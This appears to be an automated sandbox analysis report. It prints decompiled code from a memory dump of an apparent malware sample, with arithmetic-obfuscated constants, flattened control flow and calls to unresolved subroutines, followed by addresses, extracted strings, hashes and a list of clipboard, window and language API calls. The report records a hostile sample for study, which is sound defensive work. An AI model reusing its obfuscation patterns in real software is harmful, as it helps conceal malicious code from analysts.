				void* _t831;
				void* _t839;
				void* _t846;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				void* _t877;
				void* _t939;
				intOrPtr* _t959;
				signed int _t961;
				void* _t962;
				intOrPtr _t966;
				void* _t967;
				void* _t971;

				_t959 = __ecx;
				_v96 = __ecx;
				_v88 = 0x4b308c;
				_v84 = 0x68a357;
				_t966 = 0;
				_v80 = 0;
				_t846 = 0x5095c78;
				_v380 = 0x65a42d;
				_v380 = _v380 >> 5;
				_t853 = 0x2a;
				_v380 = _v380 / _t853;
				_v380 = _v380 << 0xc;
				_v380 = _v380 ^ 0x0135c000;
				_v348 = 0xa5d38e;
				_v348 = _v348 + 0xb9c5;
				_v348 = _v348 << 0xb;
				_t961 = 9;
				_v348 = _v348 * 0x52;
				_v348 = _v348 ^ 0xca24b000;
				_v140 = 0x8d3f77;
				_v140 = _v140 ^ 0x151b0181;
				_v140 = _v140 ^ 0x15963ef6;
				_v400 = 0x207a6e;
				_v400 = _v400 << 5;
				_v400 = _v400 << 8;
				_v400 = _v400 ^ 0x8b464bbd;
				_v400 = _v400 ^ 0x840b8bbd;
				_v312 = 0x1fa3da;
				_v312 = _v312 + 0x3108;
				_v312 = _v312 * 0x36;
				_v312 = _v312 ^ 0x06b6e7ac;
				_v276 = 0x748fc6;
				_v276 = _v276 + 0xffffe429;
				_v276 = _v276 | 0xa76916e4;
				_v276 = _v276 ^ 0xa77d77ef;
				_v340 = 0x455dfa;
				_v340 = _v340 ^ 0xe88bfa17;
				_v340 = _v340 + 0xffff2853;
				_v340 = _v340 ^ 0xe8cdd040;
				_v304 = 0xe2385b;
				_v304 = _v304 + 0xf051;
				_v304 = _v304 ^ 0x6c6e5fff;
				_v304 = _v304 ^ 0x6c8d7753;
				_v248 = 0xbb5b14;
				_v248 = _v248 | 0xf3fbf98f;
				_v248 = _v248 ^ 0xf3fbfb9f;
				_v368 = 0x2d4fd6;
				_v368 = _v368 ^ 0xbe47ef6a;
				_v368 = _v368 | 0x228e4a2b;
				_v368 = _v368 >> 0xf;
				_v368 = _v368 ^ 0x00017ddd;
				_v356 = 0x878a0;
				_v356 = _v356 ^ 0xc7db0bb3;
				_v356 = _v356 / _t961;
				_v356 = _v356 ^ 0x93ef2515;
				_v356 = _v356 ^ 0x85dcd542;
				_v224 = 0x4f8f83;
				_v224 = _v224 >> 0xd;
				_v224 = _v224 + 0xffff7127;
				_v224 = _v224 ^ 0xffff73a3;
				_v364 = 0xd913f0;
				_v364 = _v364 << 4;
				_v364 = _v364 + 0xffffe4f7;
				_v364 = _v364 << 6;
				_v364 = _v364 ^ 0x64479578;
				_v428 = 0x4a41b6;
				_v428 = _v428 * 0x17;
				_t854 = 0x3f;
				_v428 = _v428 / _t854;
				_v428 = _v428 + 0x4db3;
				_v428 = _v428 ^ 0x00190a3f;
				_v220 = 0x230254;
				_v220 = _v220 | 0x25a195ca;
				_v220 = _v220 ^ 0x25a440f4;
				_v164 = 0x79946d;
				_v164 = _v164 | 0x95db6f2a;
				_v164 = _v164 ^ 0x95f5ff2f;
				_v420 = 0x20555;
				_v420 = _v420 + 0x49a3;
				_v420 = _v420 + 0xffffbaa0;
				_v420 = _v420 | 0xe66c6006;
				_v420 = _v420 ^ 0xe66d9785;
				_v308 = 0x796a8b;
				_v308 = _v308 ^ 0xcf3f3c6d;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 ^ 0x0001bf3e;
				_v412 = 0x7616a8;
				_v412 = _v412 | 0x7bfedefd;
				_v412 = _v412 >> 2;
				_v412 = _v412 ^ 0x1ef4c93d;
				_v300 = 0x1188f;
				_v300 = _v300 ^ 0x999c13a2;
				_t855 = 0x7c;
				_v300 = _v300 * 0xd;
				_v300 = _v300 ^ 0xccf47946;
				_v244 = 0xfd649;
				_v244 = _v244 | 0xf733d813;
				_v244 = _v244 >> 0xd;
				_v244 = _v244 ^ 0x0005235a;
				_v200 = 0x9e9324;
				_v200 = _v200 | 0x5ba25bdd;
				_v200 = _v200 ^ 0x5bba349a;
				_v404 = 0x2330b2;
				_v404 = _v404 * 0x51;
				_v404 = _v404 * 0x1e;
				_v404 = _v404 / _t961;
				_v404 = _v404 ^ 0x08a702e8;
				_v260 = 0xc225de;
				_v260 = _v260 >> 4;
				_v260 = _v260 ^ 0x000fed8a;
				_v160 = 0x1c9307;
				_v160 = _v160 * 0x7e;
				_v160 = _v160 ^ 0x0e1bcc6b;
				_v192 = 0x8cb0be;
				_v192 = _v192 + 0x65a1;
				_v192 = _v192 ^ 0x008009d9;
				_v292 = 0x92bc67;
				_v292 = _v292 + 0xffffc3fd;
				_v292 = _v292 * 0x71;
				_v292 = _v292 ^ 0x40aaac18;
				_v372 = 0x5656da;
				_v372 = _v372 << 8;
				_v372 = _v372 | 0x5ef74142;
				_v372 = _v372 ^ 0xc573e6be;
				_v372 = _v372 ^ 0x9b83b24b;
				_v264 = 0xbc65cb;
				_v264 = _v264 / _t855;
				_v264 = _v264 >> 0x10;
				_v264 = _v264 ^ 0x0002a810;
				_v408 = 0xbec186;
				_v408 = _v408 + 0xffff9163;
				_t856 = 0x47;
				_v408 = _v408 * 0x59;
				_v408 = _v408 + 0xffff1ecb;
				_v408 = _v408 ^ 0x4229c32f;
				_v156 = 0x1bb444;
				_v156 = _v156 >> 0xc;
				_v156 = _v156 ^ 0x00030065;
				_v272 = 0x7ba9b3;
				_v272 = _v272 * 0x34;
				_v272 = _v272 >> 1;
				_v272 = _v272 ^ 0x0c847149;
				_v208 = 0xbd1be6;
				_v208 = _v208 | 0xd5578a84;
				_v208 = _v208 ^ 0xd5fa34ee;
				_v332 = 0xfe25dd;
				_v332 = _v332 * 0x2d;
				_v332 = _v332 | 0x1ec70227;
				_v332 = _v332 ^ 0x3eea9d65;
				_v444 = 0xc73971;
				_v444 = _v444 + 0xb32c;
				_v444 = _v444 | 0xfb97e021;
				_v444 = _v444 + 0xa24a;
				_v444 = _v444 ^ 0xfbde3b64;
				_v328 = 0xc31491;
				_v328 = _v328 / _t856;
				_t857 = 0x62;
				_v328 = _v328 / _t857;
				_v328 = _v328 ^ 0x0001fa75;
				_v184 = 0x1556a6;
				_v184 = _v184 | 0xd524b176;
				_v184 = _v184 ^ 0xd535a7ca;
				_v440 = 0x35c24;
				_v440 = _v440 | 0xb1338da5;
				_t858 = 0x12;
				_v440 = _v440 * 0x4e;
				_v440 = _v440 / _t858;
				_v440 = _v440 ^ 0x0e1fd3a6;
				_v168 = 0x2e720e;
				_v168 = _v168 ^ 0x20b0eb59;
				_v168 = _v168 ^ 0x209ff4ec;
				_v136 = 0xf8c881;
				_v136 = _v136 << 4;
				_v136 = _v136 ^ 0x0f86714c;
				_v176 = 0x30a8e4;
				_v176 = _v176 << 0xf;
				_v176 = _v176 ^ 0x54704d49;
				_v320 = 0xe820d3;
				_v320 = _v320 + 0x4a39;
				_v320 = _v320 + 0xffff8c06;
				_v320 = _v320 ^ 0x00e3b8f1;
				_v424 = 0xe23bc6;
				_v424 = _v424 | 0xb773a528;
				_v424 = _v424 + 0xffff9ee4;
				_v424 = _v424 + 0xd640;
				_v424 = _v424 ^ 0xb7f4e9e8;
				_v144 = 0x35d767;
				_v144 = _v144 | 0xb1fb0f4b;
				_v144 = _v144 ^ 0xb1f09f1e;
				_v432 = 0x220129;
				_v432 = _v432 + 0x2a56;
				_v432 = _v432 + 0xec9a;
				_v432 = _v432 | 0x35f45e8d;
				_v432 = _v432 ^ 0x35fbe95d;
				_v296 = 0x21bf48;
				_t859 = 0x63;
				_v296 = _v296 * 0x6e;
				_v296 = _v296 ^ 0xcf5ee5b0;
				_v296 = _v296 ^ 0xc1df8d86;
				_v128 = 0x83ca27;
				_v128 = _v128 >> 0xb;
				_v128 = _v128 ^ 0x0003e37b;
				_v416 = 0x1b76f6;
				_v416 = _v416 * 0x67;
				_v416 = _v416 ^ 0x5e43fefd;
				_v416 = _v416 | 0x6d16dae8;
				_v416 = _v416 ^ 0x7d5c7478;
				_v280 = 0x8e2df6;
				_v280 = _v280 ^ 0xeab8ff52;
				_v280 = _v280 | 0x6dde6fb0;
				_v280 = _v280 ^ 0xefff4d77;
				_v132 = 0xb4eda8;
				_v132 = _v132 + 0xffff14c3;
				_v132 = _v132 ^ 0x00bcd480;
				_v288 = 0x644029;
				_v288 = _v288 + 0xffff2e53;
				_v288 = _v288 / _t859;
				_v288 = _v288 ^ 0x00067a6b;
				_v216 = 0xec3ce2;
				_v216 = _v216 | 0x0e1cda73;
				_v216 = _v216 ^ 0x0ef221b1;
				_v256 = 0x587378;
				_v256 = _v256 + 0xc198;
				_t860 = 0x7d;
				_v256 = _v256 * 5;
				_v256 = _v256 ^ 0x01b10dc6;
				_v392 = 0x92ae50;
				_v392 = _v392 * 0x5f;
				_v392 = _v392 | 0xad1fc533;
				_v392 = _v392 << 7;
				_v392 = _v392 ^ 0xbff58d24;
				_v376 = 0xb00c13;
				_v376 = _v376 | 0x916d47ca;
				_v376 = _v376 ^ 0x4fad6c21;
				_v376 = _v376 ^ 0x8c20b6bd;
				_v376 = _v376 ^ 0x5270abc3;
				_v180 = 0x2c6669;
				_v180 = _v180 + 0xffff62ee;
				_v180 = _v180 ^ 0x00282217;
				_v188 = 0x326b32;
				_v188 = _v188 >> 0xf;
				_v188 = _v188 ^ 0x0007b375;
				_v196 = 0x9bd2c1;
				_v196 = _v196 << 4;
				_v196 = _v196 ^ 0x09b8b1db;
				_v204 = 0x1f9d8a;
				_v204 = _v204 + 0xffffb6a4;
				_v204 = _v204 ^ 0x0011e24b;
				_v384 = 0x673136;
				_v384 = _v384 << 0xa;
				_v384 = _v384 ^ 0x12bc0cc5;
				_v384 = _v384 / _t860;
				_v384 = _v384 ^ 0x01221bbd;
				_v212 = 0x91584a;
				_v212 = _v212 << 0xe;
				_v212 = _v212 ^ 0x561f57e7;
				_v240 = 0xb9c75a;
				_v240 = _v240 << 0x10;
				_v240 = _v240 | 0x65f0d503;
				_v240 = _v240 ^ 0xe7f439bf;
				_v360 = 0x5bc26f;
				_v360 = _v360 >> 4;
				_v360 = _v360 << 0xb;
				_t861 = 0x39;
				_v360 = _v360 / _t861;
				_v360 = _v360 ^ 0x00c77717;
				_v172 = 0x629181;
				_v172 = _v172 | 0xc284407b;
				_v172 = _v172 ^ 0xc2eb660c;
				_v316 = 0xe96bce;
				_v316 = _v316 + 0xffffcab9;
				_t862 = 0x1a;
				_v316 = _v316 / _t862;
				_v316 = _v316 ^ 0x000a023d;
				_v236 = 0xf837d5;
				_v236 = _v236 ^ 0x28ca4d9a;
				_t863 = 0xf;
				_v236 = _v236 / _t863;
				_v236 = _v236 ^ 0x02a25c79;
				_v324 = 0xcca430;
				_t864 = 0x58;
				_v324 = _v324 * 0x55;
				_v324 = _v324 / _t864;
				_v324 = _v324 ^ 0x00c4a948;
				_v448 = 0xca9885;
				_v448 = _v448 << 6;
				_t865 = 0x57;
				_v448 = _v448 * 0x76;
				_v448 = _v448 / _t865;
				_v448 = _v448 ^ 0x01076bc5;
				_v336 = 0x7ad46f;
				_v336 = _v336 + 0xffffd9cf;
				_t866 = 0x1d;
				_v336 = _v336 * 0x59;
				_v336 = _v336 ^ 0x2aa2cebc;
				_v252 = 0x3ea356;
				_v252 = _v252 << 1;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x46a0e067;
				_v148 = 0x4c106a;
				_v148 = _v148 >> 4;
				_v148 = _v148 ^ 0x0001e127;
				_v388 = 0x3a8b94;
				_v388 = _v388 + 0xffffc4aa;
				_v388 = _v388 + 0xffff3143;
				_v388 = _v388 / _t866;
				_v388 = _v388 ^ 0x000d4012;
				_v436 = 0xb558cd;
				_t867 = 0xe;
				_v436 = _v436 / _t867;
				_v436 = _v436 + 0x7cb9;
				_t962 = 0x4a7f8c3;
				_v104 = 0x800491f;
				_v436 = _v436 / _t961;
				_v436 = _v436 ^ 0x00055d95;
				_v268 = 0x4f2a38;
				_v268 = _v268 >> 9;
				_v268 = _v268 | 0xe8b3cd17;
				_v268 = _v268 ^ 0xe8bc8e8f;
				_v284 = 0x84377d;
				_v284 = _v284 << 0xf;
				_v284 = _v284 + 0xffff388a;
				_v284 = _v284 ^ 0x1bbc0ead;
				_v228 = 0x2ad291;
				_v228 = _v228 + 0x8129;
				_v228 = _v228 ^ 0xdb87be02;
				_v228 = _v228 ^ 0xdbac3157;
				_v396 = 0x7db796;
				_v396 = _v396 ^ 0x7a0b48f6;
				_v396 = _v396 ^ 0x3362827b;
				_v396 = _v396 + 0xffff5a7a;
				_v396 = _v396 ^ 0x4918c81d;
				_v152 = 0xea73bc;
				_v152 = _v152 | 0xe5873d2c;
				_v152 = _v152 ^ 0xe5ed942b;
				_v232 = 0xcef632;
				_v92 = 0x48;
				_v100 = 0x100;
				_v232 = _v232 * 0x56;
				_v232 = _v232 ^ 0x9c0a1ca3;
				_v232 = _v232 ^ 0xd98b3af2;
				_v344 = 0x56ea62;
				_v344 = _v344 << 9;
				_v344 = _v344 << 5;
				_v344 = _v344 ^ 0x4bc13b3f;
				_v344 = _v344 ^ 0xf15a9eb4;
				_v352 = 0xecd8a3;
				_v352 = _v352 << 6;
				_v352 = _v352 | 0x62fa7efd;
				_v352 = _v352 + 0xa6a5;
				_v352 = _v352 ^ 0x7bf0f0a6;
				while(1) {
					L1:
					_t812 = 0x5427714;
					while(1) {
						L2:
						while(1) {
							L3:
							_t939 = 0x38654c9;
							do {
								L4:
								_t971 = _t846 - _t962;
								if(_t971 > 0) {
									__eflags = _t846 - 0x5095c78;
									if(_t846 == 0x5095c78) {
										_t846 = 0x2905b1e;
										goto L34;
									} else {
										__eflags = _t846 - _t812;
										if(_t846 == _t812) {
											_t819 = E00C9758F(_v108);
											_t846 = 0x17db3ff;
											__eflags = _t819;
											_t966 =  !=  ? 1 : _t966;
											goto L1;
										} else {
											__eflags = _t846 - 0x55ddb8b;
											if(__eflags == 0) {
												_push(_v392);
												_push(0xc91000);
												__eflags = E00CA77BD( *((intOrPtr*)(_t959 + 4)), _v376,  &_v112, _v180, _v248, _v188, _v196, _v204,  *_t959, _v120, _v384, E00C93F5C(_v216, _v256, __eflags), _v212) - _v368;
												_t846 =  ==  ? 0x38654c9 : 0x1f4d081;
												E00CB0352(_v240, _v360, _t820, _v172);
												_t967 = _t967 + 0x3c;
												goto L22;
											} else {
												__eflags = _t846 - 0x800491f;
												if(_t846 == 0x800491f) {
													_v116 = _v100;
													_t827 = E00C98B42(_v120,  &_v124, _v140, _v100, _v264, _v408, _v156, _v272);
													_t967 = _t967 + 0x18;
													__eflags = _t827 - _v400;
													_t877 = 0x3d1a83d;
													_t812 = 0x5427714;
													_t846 =  ==  ? 0x3d1a83d : 0xe2d4ad7;
													goto L3;
												} else {
													__eflags = _t846 - 0xe2d4ad7;
													if(_t846 != 0xe2d4ad7) {
														goto L34;
													} else {
														E00C92153(_v224, _v232, _v344, _v120, _v352);
													}
												}
											}
										}
									}
								} else {
									if(_t971 == 0) {
										_push(_v440);
										_push(0xc91000);
										_t964 = E00C93F5C(_v328, _v184, __eflags);
										_v116 = _v92;
										_t816 = E00C9220A(_t813, _v124, _v340,  &_v76, _v168, _v136, _v176, _v320, _v424, _v144, _v92, _v92,  &_v116, _v432);
										_t967 = _t967 + 0x30;
										__eflags = _t816 - _v304;
										if(_t816 != _v304) {
											_t846 = 0x1f4d081;
										} else {
											E00C91ED4( &_v68, _v296,  *0xcb6048 + 0x24, 0x40, _v128, _v416);
											_t967 = _t967 + 0x10;
											_t846 = 0x55ddb8b;
										}
										E00CB0352(_v280, _v132, _t964, _v288);
										goto L22;
									} else {
										if(_t846 == 0x17db3ff) {
											E00CACDFF(_v336, _v108, _v252);
											_t846 = 0x2a5562c;
											while(1) {
												L1:
												_t812 = 0x5427714;
												goto L2;
											}
										} else {
											if(_t846 == 0x1f4d081) {
												E00C91F77(_v124, _v284, _v228, _v396, _v152);
												_t967 = _t967 + 0xc;
												_t846 = 0xe2d4ad7;
												while(1) {
													L1:
													_t812 = 0x5427714;
													goto L2;
												}
											} else {
												if(_t846 == 0x2905b1e) {
													_push(_v220);
													_push(0xc91150);
													_t831 = E00C93F5C(_v364, _v428, __eflags);
													_push(_v308);
													_push(0xc91030);
													__eflags = E00CA54FD(_v412,  &_v120, _t831, _v300, _v244, _v380, _v200, E00C93F5C(_v164, _v420, __eflags)) - _v348;
													_t846 =  ==  ? _v104 : 0x66c680f;
													E00CB0352(_v404, _v260, _t831, _v160);
													E00CB0352(_v192, _v292, _t832, _v372);
													_t959 = _v96;
													_t967 = _t967 + 0x38;
													L22:
													_t962 = 0x4a7f8c3;
													_t812 = 0x5427714;
													_t877 = 0x3d1a83d;
													_t939 = 0x38654c9;
													goto L34;
												} else {
													if(_t846 == 0x2a5562c) {
														E00C91F77(_v112, _v148, _v388, _v436, _v268);
														_t967 = _t967 + 0xc;
														_t846 = 0x1f4d081;
														while(1) {
															L1:
															_t812 = 0x5427714;
															goto L2;
														}
													} else {
														if(_t846 == _t939) {
															_t839 = E00CAEC19(_v112, _v316, _v236,  &_v108, _v124, _v356, _v324);
															_t967 = _t967 + 0x14;
															__eflags = _t839;
															_t812 = 0x5427714;
															_t846 =  ==  ? 0x5427714 : 0x2a5562c;
															goto L2;
														} else {
															if(_t846 != _t877) {
																goto L34;
															} else {
																E00CB3044(_v208, _v124, _v332, _v312, _v444);
																_t967 = _t967 + 0xc;
																_t846 =  ==  ? _t962 : 0x1f4d081;
																while(1) {
																	L1:
																	_t812 = 0x5427714;
																	L2:
																	L3:
																	_t939 = 0x38654c9;
																	goto L4;
																}
															}
														}
													}
												}
											}
										}
									}
								}
								L29:
								return _t966;
								L34:
								__eflags = _t846 - 0x66c680f;
							} while (__eflags != 0);
							goto L29;
						}
					}
				}
			}

0x00ca7edb
0x00ca7edd
0x00ca7ee4
0x00ca7ef1
0x00ca7efc
0x00ca7efe
0x00ca7f05
0x00ca7f0a
0x00ca7f12
0x00ca7f1d
0x00ca7f22
0x00ca7f28
0x00ca7f2d
0x00ca7f35
0x00ca7f3d
0x00ca7f45
0x00ca7f4f
0x00ca7f50
0x00ca7f54
0x00ca7f5c
0x00ca7f67
0x00ca7f72
0x00ca7f7d
0x00ca7f85
0x00ca7f8a
0x00ca7f8f
0x00ca7f97
0x00ca7f9f
0x00ca7faa
0x00ca7fbd
0x00ca7fc4
0x00ca7fcf
0x00ca7fda
0x00ca7fe5
0x00ca7ff0
0x00ca7ffb
0x00ca8006
0x00ca8011
0x00ca801c
0x00ca8027
0x00ca8032
0x00ca803d
0x00ca8048
0x00ca8053
0x00ca805e
0x00ca8069
0x00ca8074
0x00ca807c
0x00ca8084
0x00ca808c
0x00ca8091
0x00ca8099
0x00ca80a1
0x00ca80af
0x00ca80b3
0x00ca80bb
0x00ca80c3
0x00ca80ce
0x00ca80d6
0x00ca80e1
0x00ca80ec
0x00ca80f4
0x00ca80f9
0x00ca8101
0x00ca8106
0x00ca810e
0x00ca811b
0x00ca8127
0x00ca812c
0x00ca8130
0x00ca8138
0x00ca8140
0x00ca814b
0x00ca8156
0x00ca8161
0x00ca816c
0x00ca8177
0x00ca8182
0x00ca818a
0x00ca8192
0x00ca819a
0x00ca81a2
0x00ca81aa
0x00ca81b5
0x00ca81c0
0x00ca81c8
0x00ca81d3
0x00ca81db
0x00ca81e3
0x00ca81e8
0x00ca81f0
0x00ca81fb
0x00ca8210
0x00ca8211
0x00ca8218
0x00ca8223
0x00ca822e
0x00ca8239
0x00ca8241
0x00ca824c
0x00ca8257
0x00ca8262
0x00ca826d
0x00ca827a
0x00ca8283
0x00ca828f
0x00ca8293
0x00ca829b
0x00ca82a6
0x00ca82bc
0x00ca82c7
0x00ca82da
0x00ca82e1
0x00ca82ec
0x00ca82f7
0x00ca8302
0x00ca830d
0x00ca8318
0x00ca832b
0x00ca8332
0x00ca833d
0x00ca8345
0x00ca834a
0x00ca8352
0x00ca835a
0x00ca8362
0x00ca8376
0x00ca837d
0x00ca8385
0x00ca8390
0x00ca839a
0x00ca83a9
0x00ca83ac
0x00ca83b0
0x00ca83b8
0x00ca83c0
0x00ca83cb
0x00ca83d3
0x00ca83de
0x00ca83f1
0x00ca83f8
0x00ca83ff
0x00ca840a
0x00ca8415
0x00ca8420
0x00ca842b
0x00ca843e
0x00ca8445
0x00ca8450
0x00ca845b
0x00ca8463
0x00ca846b
0x00ca8473
0x00ca847b
0x00ca8483
0x00ca8499
0x00ca84a7
0x00ca84ac
0x00ca84b5
0x00ca84c0
0x00ca84cb
0x00ca84d6
0x00ca84e1
0x00ca84e9
0x00ca84f6
0x00ca84f7
0x00ca8501
0x00ca8505
0x00ca850d
0x00ca8518
0x00ca8523
0x00ca852e
0x00ca8539
0x00ca8541
0x00ca854c
0x00ca8557
0x00ca855f
0x00ca856a
0x00ca8575
0x00ca8580
0x00ca858b
0x00ca8596
0x00ca859e
0x00ca85a6
0x00ca85ae
0x00ca85b6
0x00ca85be
0x00ca85c9
0x00ca85d4
0x00ca85df
0x00ca85e7
0x00ca85ef
0x00ca85f7
0x00ca85ff
0x00ca8607
0x00ca861e
0x00ca8621
0x00ca8628
0x00ca8633
0x00ca863e
0x00ca8649
0x00ca8651
0x00ca865c
0x00ca8669
0x00ca866d
0x00ca8675
0x00ca867d
0x00ca8685
0x00ca8690
0x00ca869b
0x00ca86a6
0x00ca86b1
0x00ca86bc
0x00ca86c7
0x00ca86d2
0x00ca86dd
0x00ca86f3
0x00ca86fa
0x00ca8705
0x00ca8710
0x00ca871b
0x00ca8726
0x00ca8731
0x00ca8744
0x00ca8745
0x00ca874c
0x00ca8757
0x00ca8764
0x00ca8768
0x00ca8770
0x00ca8775
0x00ca877d
0x00ca8785
0x00ca878d
0x00ca8795
0x00ca879d
0x00ca87a5
0x00ca87b0
0x00ca87bb
0x00ca87c6
0x00ca87d1
0x00ca87d9
0x00ca87e4
0x00ca87ef
0x00ca87f7
0x00ca8802
0x00ca880d
0x00ca8818
0x00ca8823
0x00ca882b
0x00ca8830
0x00ca883e
0x00ca8842
0x00ca884a
0x00ca8855
0x00ca885d
0x00ca8868
0x00ca8873
0x00ca887b
0x00ca8886
0x00ca8891
0x00ca8899
0x00ca889e
0x00ca88ab
0x00ca88b0
0x00ca88b6
0x00ca88be
0x00ca88c9
0x00ca88d4
0x00ca88df
0x00ca88ea
0x00ca88fc
0x00ca8901
0x00ca890a
0x00ca8915
0x00ca8920
0x00ca8932
0x00ca8937
0x00ca8940
0x00ca894b
0x00ca895e
0x00ca8961
0x00ca8973
0x00ca897a
0x00ca8985
0x00ca898d
0x00ca8997
0x00ca899a
0x00ca89a6
0x00ca89aa
0x00ca89b2
0x00ca89bd
0x00ca89d0
0x00ca89d3
0x00ca89da
0x00ca89e5
0x00ca89f0
0x00ca89f7
0x00ca89ff
0x00ca8a0a
0x00ca8a15
0x00ca8a1d
0x00ca8a28
0x00ca8a30
0x00ca8a38
0x00ca8a48
0x00ca8a4c
0x00ca8a54
0x00ca8a60
0x00ca8a63
0x00ca8a67
0x00ca8a77
0x00ca8a7c
0x00ca8a87
0x00ca8a8b
0x00ca8a93
0x00ca8a9e
0x00ca8aa6
0x00ca8ab1
0x00ca8abc
0x00ca8ac7
0x00ca8acf
0x00ca8ada
0x00ca8ae5
0x00ca8af0
0x00ca8afb
0x00ca8b06
0x00ca8b11
0x00ca8b19
0x00ca8b21
0x00ca8b29
0x00ca8b31
0x00ca8b39
0x00ca8b44
0x00ca8b4f
0x00ca8b5a
0x00ca8b6d
0x00ca8b78
0x00ca8b83
0x00ca8b8a
0x00ca8b95
0x00ca8ba0
0x00ca8ba8
0x00ca8bad
0x00ca8bb2
0x00ca8bba
0x00ca8bc2
0x00ca8bca
0x00ca8bcf
0x00ca8bd7
0x00ca8bdf
0x00ca8be7
0x00ca8be7
0x00ca8be7
0x00ca8bec
0x00ca8bec
0x00ca8bf1
0x00ca8bf1
0x00ca8bf1
0x00ca8bf6
0x00ca8bf6
0x00ca8bf6
0x00ca8bf8
0x00ca8f0e
0x00ca8f14
0x00ca90a4
0x00000000
0x00ca8f1a
0x00ca8f1a
0x00ca8f1c
0x00ca908d
0x00ca9094
0x00ca909a
0x00ca909c
0x00000000
0x00ca8f22
0x00ca8f22
0x00ca8f28
0x00ca8fdb
0x00ca8fed
0x00ca9059
0x00ca9075
0x00ca9079
0x00ca907e
0x00000000
0x00ca8f2e
0x00ca8f2e
0x00ca8f34
0x00ca8f93
0x00ca8fb4
0x00ca8fbb
0x00ca8fc7
0x00ca8fc9
0x00ca8fce
0x00ca8fd3
0x00000000
0x00ca8f36
0x00ca8f36
0x00ca8f3c
0x00000000
0x00ca8f42
0x00ca8f62
0x00ca8f67
0x00ca8f3c
0x00ca8f34
0x00ca8f28
0x00ca8f1c
0x00ca8bfe
0x00ca8bfe
0x00ca8e14
0x00ca8e26
0x00ca8e3d
0x00ca8e46
0x00ca8e8f
0x00ca8e94
0x00ca8e97
0x00ca8e9e
0x00ca8ed3
0x00ca8ea0
0x00ca8ec4
0x00ca8ec9
0x00ca8ecc
0x00ca8ecc
0x00ca8eee
0x00000000
0x00ca8c04
0x00ca8c0a
0x00ca8e03
0x00ca8e0a
0x00ca8be7
0x00ca8be7
0x00ca8be7
0x00000000
0x00ca8be7
0x00ca8c10
0x00ca8c16
0x00ca8dd8
0x00ca8ddd
0x00ca8de0
0x00ca8be7
0x00ca8be7
0x00ca8be7
0x00000000
0x00ca8be7
0x00ca8c1c
0x00ca8c22
0x00ca8cfa
0x00ca8d09
0x00ca8d0e
0x00ca8d13
0x00ca8d27
0x00ca8d6c
0x00ca8d80
0x00ca8d89
0x00ca8da4
0x00ca8da9
0x00ca8db0
0x00ca8ef5
0x00ca8ef5
0x00ca8efa
0x00ca8eff
0x00ca8f04
0x00000000
0x00ca8c28
0x00ca8c2e
0x00ca8ce8
0x00ca8ced
0x00ca8cf0
0x00ca8be7
0x00ca8be7
0x00ca8be7
0x00000000
0x00ca8be7
0x00ca8c34
0x00ca8c36
0x00ca8caf
0x00ca8cb4
0x00ca8cbc
0x00ca8cbe
0x00ca8cc3
0x00000000
0x00ca8c38
0x00ca8c3a
0x00000000
0x00ca8c40
0x00ca8c60
0x00ca8c67
0x00ca8c78
0x00ca8be7
0x00ca8be7
0x00ca8be7
0x00ca8bec
0x00ca8bf1
0x00ca8bf1
0x00000000
0x00ca8bf1
0x00ca8be7
0x00ca8c3a
0x00ca8c36
0x00ca8c2e
0x00ca8c22
0x00ca8c16
0x00ca8c0a
0x00ca8bfe
0x00ca8f6c
0x00ca8f76
0x00ca90a9
0x00ca90a9
0x00ca90a9
0x00000000
0x00ca90b5
0x00ca8bf1
0x00ca8bec

Strings

bV, xrefs: 00CA8BA0
)@d, xrefs: 00CA86D2
61g, xrefs: 00CA8823
[8, xrefs: 00CA8027
e, xrefs: 00CA83D3
if,, xrefs: 00CA87A5
<, xrefs: 00CA8705
H, xrefs: 00CA8B6D
2k2, xrefs: 00CA87C6
8*O, xrefs: 00CA8A93
xsX, xrefs: 00CA8726
xt\}, xrefs: 00CA867D
9J, xrefs: 00CA8575
V*, xrefs: 00CA85E7
nz , xrefs: 00CA7F7D
IMpT, xrefs: 00CA855F

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: )@d$2k2$61g$8*O$9J$H$IMpT$V*$[8$bV$e$if,$nz $xsX$xt\}$<
API String ID: 0-3960585842
Opcode ID: 54c5955e151d8f6631dafd2e023b4c956b665b94c158ab89e2dd9cacce6077c9
Instruction ID: 1a43cd10b6dd2f4c48972d595acf1fc0eb78f075f99ffd229303b2ec6380ec06
Opcode Fuzzy Hash: 54c5955e151d8f6631dafd2e023b4c956b665b94c158ab89e2dd9cacce6077c9
Instruction Fuzzy Hash: D892F0715093818FD379CF65C88AB9BBBE1BBC5308F10891DE5DA86260DBB18949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 6F185EE0, Relevance: 19.9, APIs: 13, Instructions: 427threadclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6F186935), ref: 6F186183
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F1861A1
AnyPopup.USER32 ref: 6F186305
GetCurrentThread.KERNEL32 ref: 6F186401

Part of subcall function 6F185A30: IsSystemResumeAutomatic.KERNEL32 ref: 6F185BA0

GetUserDefaultUILanguage.KERNEL32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6F186935), ref: 6F186355

Part of subcall function 6F185A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6F186431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6F185A3C
Part of subcall function 6F185A30: CloseClipboard.USER32 ref: 6F185A73
Part of subcall function 6F185A30: GetMenuCheckMarkDimensions.USER32 ref: 6F185B30

GetErrorMode.KERNEL32(0000002E,00000000,?,?,?,?,?,?,6F186935), ref: 6F186448
GetThreadErrorMode.KERNEL32(?,?,?,?,?,?,6F186935), ref: 6F1864B0
GetClipboardViewer.USER32 ref: 6F185F76

Part of subcall function 6F185C20: UnregisterApplicationRestart.KERNEL32 ref: 6F185C40
Part of subcall function 6F185C20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F185CAC

GetSystemDefaultLangID.KERNEL32 ref: 6F185FE3
